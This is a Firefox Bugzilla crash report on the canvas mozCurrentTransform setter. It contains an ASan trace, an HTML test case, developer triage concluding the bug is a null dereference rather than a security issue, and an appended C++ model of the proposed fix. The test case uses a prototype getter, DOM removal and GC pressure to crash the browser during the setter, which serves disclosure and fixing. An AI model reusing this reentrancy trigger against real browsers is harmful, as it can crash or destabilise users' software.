Crash when handling CanvasRenderingContext2D::SetMozCurrentTransform
Component: Core :: Graphics: Canvas2D (defect)
Reporter: jtjisgod (Unassigned)
Keywords: reporter-external; Whiteboard: [reporter-external] [client-bounty-form] [verif?]
Attachments: 1 file (688 bytes, text/html)
Version: firefox-101.0a1.en-US.linux-x86_64-asan-reporter
ASan log:
=================================================================
==214031==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7feae25e45df bp 0x7ffef24d1250 sp 0x7ffef24d1140 T0)
==214031==The signal is caused by a READ memory access.
==214031==Hint: address points to the zero page.
#0 0x7feae25e45df in mozilla::dom::CanvasRenderingContext2D::SetMozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:2137:16
#1 0x7feae0fc6979 in mozilla::dom::CanvasRenderingContext2D_Binding::set_mozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/CanvasRenderingContext2DBinding.cpp:2122:24
#2 0x7feae240d7c5 in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3218:8
#3 0x7feaebefe550 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:420:13
#4 0x7feaebefe550 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:507:12
#5 0x7feaebf00e61 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:10
#6 0x7feaebf00e61 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:605:8
#7 0x7feaebf037f8 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:746:10
#8 0x7feaec280e14 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, js::PropertyResult const&, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2490:8
#9 0x7feaec27e18e in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2524:14
#10 0x7feaebee4e7e in SetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:308:10
#11 0x7feaebee4e7e in SetObjectElementOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:1817:10
#12 0x7feaebee4e7e in Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3075:12
#13 0x7feaebed3e47 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:389:13
#14 0x7feaebefe7b1 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:539:13
#15 0x7feaebf00e61 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:10
#16 0x7feaebf00e61 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:605:8
#17 0x7feaec0362b9 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
#18 0x7feae1e3d83c in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:266:37
#19 0x7feae2faee7d in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#20 0x7feae2faee7d in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12
#21 0x7feae2f61de6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1316:22
#22 0x7feae2f63def in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1507:17
#23 0x7feae2f4b744 in HandleEvent /builds/worker/checkouts/gecko/dom/events/EventListenerManager.h:395:5
#24 0x7feae2f4b744 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:348:17
#25 0x7feae2f496e0 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:550:16
#26 0x7feae2f4fe13 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1119:11
#27 0x7feae6ad66f6 in mozilla::PresShell::EventHandler::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8685:7
#28 0x7feae6ad36bd in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8257:7
#29 0x7feae6aca5cb in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8189:17
#30 0x7feae6ad0ad7 in mozilla::PresShell::EventHandler::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8097:17
#31 0x7feae2eab7d5 in HandleEventWithTarget /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:655:25
#32 0x7feae2eab7d5 in mozilla::EventStateManager::InitAndDispatchClickEvent(mozilla::WidgetMouseEvent*, nsEventStatus*, mozilla::EventMessage, mozilla::PresShell*, nsIContent*, AutoWeakFrame, bool, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5238:29
#33 0x7feae2eac047 in mozilla::EventStateManager::DispatchClickEvents(mozilla::PresShell*, mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5340:17
#34 0x7feae2ea55ec in mozilla::EventStateManager::PostHandleMouseUp(mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5283:17
#35 0x7feae2ea30fa in mozilla::EventStateManager::PostHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:3569:18
#36 0x7feae6ad3a56 in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8271:30
#37 0x7feae6aca5cb in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8189:17
#38 0x7feae6ac92ce in mozilla::PresShell::EventHandler::HandleEventUsingCoordinates(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7107:30
#39 0x7feae6ac6e8b in mozilla::PresShell::EventHandler::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6910:12
#40 0x7feae6ac5760 in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6853:23
#41 0x7feae61380fd in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/checkouts/gecko/view/nsViewManager.cpp:685:18
#42 0x7feae6137a87 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/worker/checkouts/gecko/view/nsView.cpp:1129:9
#43 0x7feae61d6487 in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/worker/checkouts/gecko/widget/PuppetWidget.cpp:354:37
#44 0x7feaded8d7b0 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/worker/checkouts/gecko/gfx/layers/apz/util/APZCCallbackHelper.cpp:502:21
#45 0x7feae520ca43 in DispatchWidgetEventViaAPZ /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1777:10
#46 0x7feae520ca43 in mozilla::dom::BrowserChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1740:3
#47 0x7feae520be36 in mozilla::dom::BrowserChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1568:7
#48 0x7feae520f1aa in mozilla::dom::BrowserChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1704:5
#49 0x7feae53c9920 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PBrowserChild.cpp:5719:56
#50 0x7feae54b2b02 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8837:32
#51 0x7feaddec49bf in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1705:25
#52 0x7feaddec1ae3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message&&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1630:9
#53 0x7feaddec357d in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1526:14
#54 0x7feadc5ae650 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467:16
#55 0x7feadc567ef3 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:780:26
#56 0x7feadc5648a8 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:612:15
#57 0x7feadc564fbc in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390:36
#58 0x7feadc5b86b4 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:127:37
#59 0x7feadc5b86b4 in mozilla::detail::RunnableFunction<mozilla::TaskController::InitializeInternal()::$_1>::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
#60 0x7feadc58f43d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1180:16
#61 0x7feadc59b501 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
#62 0x7feaddecd43b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:107:5
#63 0x7feaddd1b462 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:380:10
#64 0x7feaddd1b462 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:373:3
#65 0x7feaddd1b462 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:355:3
#66 0x7feae627126a in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
#67 0x7feaebb149ff in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:877:20
#68 0x7feaddd1b462 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:380:10
#69 0x7feaddd1b462 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:373:3
#70 0x7feaddd1b462 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:355:3
#71 0x7feaebb1369a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:736:34
#72 0x560b304e4574 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
#73 0x560b304e4574 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
#74 0x7feaf56c70b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
#75 0x560b30423e78 in _start (/home/jtjisgod/Desktop/firefox/files/2022_05_firefox-101.0a1.en-US.linux-x86_64-asan-reporter/firefox/firefox-bin+0xb1e78) (BuildId: 27474999a494e4881eb40d5c1e6f6411aa595bc8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:2137:16 in mozilla::dom::CanvasRenderingContext2D::SetMozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&)
==214031==ABORTING
x86-64
mozilla-central-asan-nightly
101.0a1-20220501092542-https://hg.mozilla.org/mozilla-central/rev/f0fda878f51a5f5aaa7ed422e9062f5bfa0e8148
Comment 1 (Reporter), 3 years ago
ASan is saying it is a null dereference, but it looks like a UAF to me.
Description
[1] CanvasRenderingContext2D::SetMozCurrentTransform is triggered by canvas.getContext('2d').mozCurrentTransform = arr1.
[2] ObjectToMatrix in CanvasRenderingContext2D.cpp is [3] called from SetMozCurrentTransform and SetMozCurrentTransformInverse.
Finally, ObjectToMatrix [4] calls JS_GetElement, which can execute JavaScript.
Alloc
<canvas id="my-house" width="300" height="300"></canvas>
Free
The canvas will be deleted and freed in Array's defineGetter which is called by JS_GetElement.
Use
void CanvasRenderingContext2D::SetMozCurrentTransform(
JSContext* aCx, JS::Handle<JSObject*> aCurrentTransform,
ErrorResult& aError) {
EnsureTarget();
if (!IsTargetValid()) {
aError.Throw(NS_ERROR_FAILURE);
return;
}
Matrix newCTM;
if (ObjectToMatrix(aCx, aCurrentTransform, newCTM, aError) &&
newCTM.IsFinite()) {
mTarget->SetTransform(newCTM); // Here
}
}
[1] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2076
[2] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2045
[3] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2086
[4] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2059
Comment 2, 3 years ago
Do you have a stack for where the free is occurring? Why are you sure that the defineGetter call is actually causing the canvas to be freed? This sort of issue is quite common, so we usually root objects on the stack so they won't be freed by these callbacks. I'm not saying we never fail to root things in this way, but I think it usually shows up in ASan. Do you have a particular unrooted stack reference in mind that you think could be causing a use-after-free?
Comment 3 (Reporter), 2 years ago
It may be a wrong guess because I'm still a beginner.
I didn't check the free with a debugger, but I guessed defineGetter calls my JavaScript code, which removes the canvas object.
I think the canvas object has mTarget, which is freed in that function.
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<body>
<button onclick="f()">ClickMe!</button>
<div id="canvas_wrapper">
CANVAS
<canvas id="my-house" width="300" height="300"></canvas>
</div>
<script>
// Allocation pressure, intended to encourage a GC pass while the getter runs.
GC = function() {
  for (var i = 0; i < 0x200000; ++i) {
    var s = new String('AAAA');
  }
};
canvas = document.getElementById('my-house');
// Index 0 is a hole, so reading it falls through to the getter installed on the prototype.
arr1 = [, 1, 1, 1, 1, 1];
arr1.__proto__.__defineGetter__(0, function(x) {
  canvas = null;
  document.getElementById("canvas_wrapper").innerHTML = "Removed"; // Remove Canvas
  GC();
  alert();
  return 1;
});
// The setter reads the six array elements via JS_GetElement, which runs the getter above.
function f() {
  canvas.getContext('2d').mozCurrentTransform = arr1;
}
</script>
</body>
</html>
Comment 4 (Reporter), 2 years ago
It is a similar bug to CVE-2019-11757.
https://bugzilla.mozilla.org/show_bug.cgi?id=1577107
Comment 5 (Reporter), 2 years ago
I've confirmed that the bug occurs even if I just put an alert without removing the innerHTML.
As you said, defineGetter does not free the object, but some mechanism freed the object.
CanvasRenderingContext2D's dtor calls Reset(), which sets mTarget to nullptr.
So I guessed the CanvasRenderingContext2D object was freed.
nsresult CanvasRenderingContext2D::Reset() {
if (mCanvasElement) {
mCanvasElement->InvalidateCanvas();
}
// only do this for non-docshell created contexts,
// since those are the ones that we created a surface for
if (mTarget && IsTargetValid() && !mDocShell) {
gCanvasAzureMemoryUsed -= mWidth * mHeight * 4;
}
bool forceReset = true;
ReturnTarget(forceReset);
mTarget = nullptr;
mBufferProvider = nullptr;
// Since the target changes the backing texture will change, and this will
// no longer be valid.
mIsEntireFrameInvalid = false;
mPredictManyRedrawCalls = false;
mFrameCaptureState = FrameCaptureState::CLEAN;
return NS_OK;
}
Comment 6, 2 years ago
firefox-101.0a1.en-US.linux-x86_64-asan-reporter
We do appreciate you testing Nightly builds ("0a1") but Firefox 101 is 4 months old at this point. Can you reproduce this in Firefox 105.0a1? We tried using your testcase and could not.
ASAN nightly builds should self-update. If yours are somehow stuck on old versions please contact the folks in the #fuzzing channel on https://chat.mozilla.org/
Comment 7 (Reporter), 2 years ago
I'm using Mozilla's asan-reporter build.
The mozCurrentTransform will be deprecated. So any higher version of Firefox can't trigger the bug, not even the Firefox 102 nightly build.
But this bug is reproduced on macOS with the Firefox 102 release version (latest).
Comment 8 (Reporter), 2 years ago
The mozCurrentTransform will be deprecated. So any higher version of Firefox can't trigger the bug, not even the Firefox 102 nightly build.
But this bug is reproduced on macOS with the Firefox 102 and 103 release versions.
Comment 9, 2 years ago
In a release build it's a null deref: bp-55d8e59c-4110-452d-a13e-bb9ce0220803 (which doesn't mean it's not potentially worse as detected by ASAN). In this case, however, ASAN is also not detecting a UAF and that's usually pretty reliable. I'm not sure your theory holds up about the re-use, but asking some of the devs who are trying to deprecate this.
I assume we're deprecating mozCurrentTransform because of the moz prefix, which typically means something is now an adopted standard. It's possible the standard behavior is different, but did you try this with the standard transform?
Comment 10, 2 years ago
It's a null deref, I think, we're clearing the target after checking for it, which is a bug, but not a security issue afaict. Bug 1782651 was submitted literally two days ago. I just pushed to let the removal ride the trains.
The fix could be just swapping the order of ConvertToMatrix and EnsureTarget, but it's probably not worth fixing unless we think there's a real security impact. If you need an upliftable patch I could do that though.
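The check-then-script-then-use ordering described in comment 1 and the reordering proposed in comment 10, as an added illustrative C++ model that is not Gecko code: DrawTarget, JsArray, Context and the Outcome enum are simplified stand-ins chosen here, and the getter hook plays the role of the __defineGetter__ that JS_GetElement ends up running. The model follows the thread's conclusion that the target is nulled rather than left dangling, so the reported order is made to report the would-be null dereference instead of performing it.

```cpp
// Illustrative model of the reported pattern; not Gecko's code. Names mirror the
// bug (EnsureTarget, IsTargetValid, ObjectToMatrix, Reset); the types are stand-ins.
#include <functional>
#include <iostream>
#include <memory>

// Stand-in for the drawing target the setter writes the transform into.
struct DrawTarget {
  double ctm[6] = {1, 0, 0, 1, 0, 0};
  void SetTransform(const double* m) {
    for (int i = 0; i < 6; ++i) ctm[i] = m[i];
  }
};

// Stand-in for the JS array handed to the setter. Reading element 0 runs the
// hook, the way JS_GetElement runs a getter installed on the prototype.
struct JsArray {
  double values[6] = {1, 0, 0, 1, 0, 0};
  std::function<void()> getterOnIndex0;  // empty means no script runs
};

enum class Outcome { Rejected, WouldDerefNull, Applied };

struct Context {
  std::unique_ptr<DrawTarget> mTarget;

  void EnsureTarget() {
    if (!mTarget) mTarget = std::make_unique<DrawTarget>();
  }
  bool IsTargetValid() const { return mTarget != nullptr; }
  // What teardown does in the model: drop the target. Script inside the getter can reach this.
  void Reset() { mTarget.reset(); }

  // Models ObjectToMatrix: element reads may re-enter script.
  bool ObjectToMatrix(JsArray& arr, double out[6]) {
    for (int i = 0; i < 6; ++i) {
      if (i == 0 && arr.getterOnIndex0) arr.getterOnIndex0();
      out[i] = arr.values[i];
    }
    return true;
  }

  // Order from the reported code: validate the target, run script, then use the target.
  Outcome SetTransformReportedOrder(JsArray& arr) {
    EnsureTarget();
    if (!IsTargetValid()) return Outcome::Rejected;
    double ctm[6];
    if (!ObjectToMatrix(arr, ctm)) return Outcome::Rejected;
    if (!mTarget) return Outcome::WouldDerefNull;  // the original has no such guard: SEGV site
    mTarget->SetTransform(ctm);
    return Outcome::Applied;
  }

  // Order suggested in comment 10: run the script-invoking conversion first,
  // then establish and validate the target, then use it.
  Outcome SetTransformFixedOrder(JsArray& arr) {
    double ctm[6];
    if (!ObjectToMatrix(arr, ctm)) return Outcome::Rejected;
    EnsureTarget();
    if (!IsTargetValid()) return Outcome::Rejected;
    mTarget->SetTransform(ctm);
    return Outcome::Applied;
  }
};

static const char* Name(Outcome o) {
  switch (o) {
    case Outcome::Rejected: return "Rejected";
    case Outcome::WouldDerefNull: return "WouldDerefNull";
    default: return "Applied";
  }
}

int main() {
  Context ctx;
  JsArray arr;                                   // constructed input: translate(10, 20)
  arr.values[4] = 10;
  arr.values[5] = 20;
  arr.getterOnIndex0 = [&ctx] { ctx.Reset(); };  // hostile getter tears the target down

  std::cout << "reported order: " << Name(ctx.SetTransformReportedOrder(arr)) << "\n";
  std::cout << "fixed order:    " << Name(ctx.SetTransformFixedOrder(arr)) << "\n";
  return 0;
}
```

With the hostile getter the reported order ends at WouldDerefNull while the fixed order ends at Applied, because EnsureTarget runs after the last point at which script could have cleared mTarget; with a benign array both orders apply the transform.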
Comment 11, 2 years ago
I didn't know who else needed to look at bug 1782651 so I also added :jrmuizel as a reviewer. Please land the patch for me when everything is ready.
Comment 13, 1 year ago
A needinfo is requested from the reporter, however, the reporter is inactive on Bugzilla. Closing the bug as incomplete.
For more information, please visit BugBot documentation.